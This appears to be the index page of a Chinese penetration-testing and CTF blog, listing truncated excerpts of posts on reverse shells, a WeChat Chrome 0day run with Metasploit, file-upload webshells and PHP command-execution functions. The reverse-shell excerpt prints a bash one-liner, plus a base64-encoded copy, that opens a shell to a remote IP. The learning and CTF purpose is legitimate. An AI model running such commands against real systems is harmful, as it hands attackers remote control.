小非鱼

摘要： Windows日志说明 使用powershell,查看不为空的日志 Get-WinEvent -ListLog *| where-object {$_.IsEnabled -eq "True" -and $_.RecordCount -gt "0"} | sort-object -property 阅读全文

该文被密码保护。 阅读全文

摘要： JAVA多版本 前言 在使用burp2020的时候要使用jdk13版本，我为了使用burp2020版本抛弃了jdk1.8，现在在工作中要使用工具，工具大部分没适配jdk13或以上版本，导致许多工具无法使用，现在尝试安装双版本java. 以下是java15路径 C:\Program Files\Com 阅读全文

摘要： ciscn国赛初赛 前言 ​ 这几天跟tony，Trendy，Kaunm师傅参加了ciscn国赛 tiny traffic 首先，下载好附件，使用Wireshark打开 直接导出http协议的包 在出http协议的包时会出现，两个可疑的文件 经过Wankko Ree师傅的提示，原来是protocol 阅读全文

摘要： Linux 反弹shell 姿势一：bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版：bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+J 阅读全文

摘要： WX利用Chrome 0day 这里所用的环境 windows7，kali，外网服务器 首先，在外网部署利用代码，使用phpstudy作为中间件，一个index.html，一个js文件 部署后，在靶机windows7装微信 准备就绪 kali: 打开msfconsole use exploit/mu 阅读全文

摘要： 前言 文件上传漏洞简单来说，就是木马上传到服务器导致可以上传可执行的恶意代码，也就是拿到webshell，从而对网站造成严重的后果。 前端认证 通常是用JS对上传的后缀名，或者对上传的文件内容进行过滤。过滤通常有白名单和黑名单 这里的绕过方法有很多，这里举个白名单的例子，假如白名单限制上传的格式为j 阅读全文

摘要： php执行命令函数 常见的php系统执行函数 #有显示输出 system() #有显示输出 passthru() #没有显示输出 exec() #没有显示输出 shell_exec() //反引号也是 system() system — 执行外部程序，并且显示输出 string system( st 阅读全文

摘要： TASK 2021.6 域渗透知识学习 通关至少两个vulnstack靶机 安全技能 该技能表不用按顺序进行学习，但是比较高级的我会放最后面，因为我也不会，需要花时间慢慢加。 总结我这几年的一点经验：安全需要学习的技术太多了，特别是红队、渗透测试、如果是安服相对来说不是那么多，但是我们精力有限，根本 阅读全文

摘要： flag给你 这题考点flag格式 常见的格式flag{}，ctf{}等等 还有些靶场会根据自己的网站来定义，如:hctf{},FCTF{}等等 flag内容，指的是大括号里的内容，内容不能有空格，特殊字符(除[-,_]外) 以后可能会有中文的flag 序列化 <?php error_reporti 阅读全文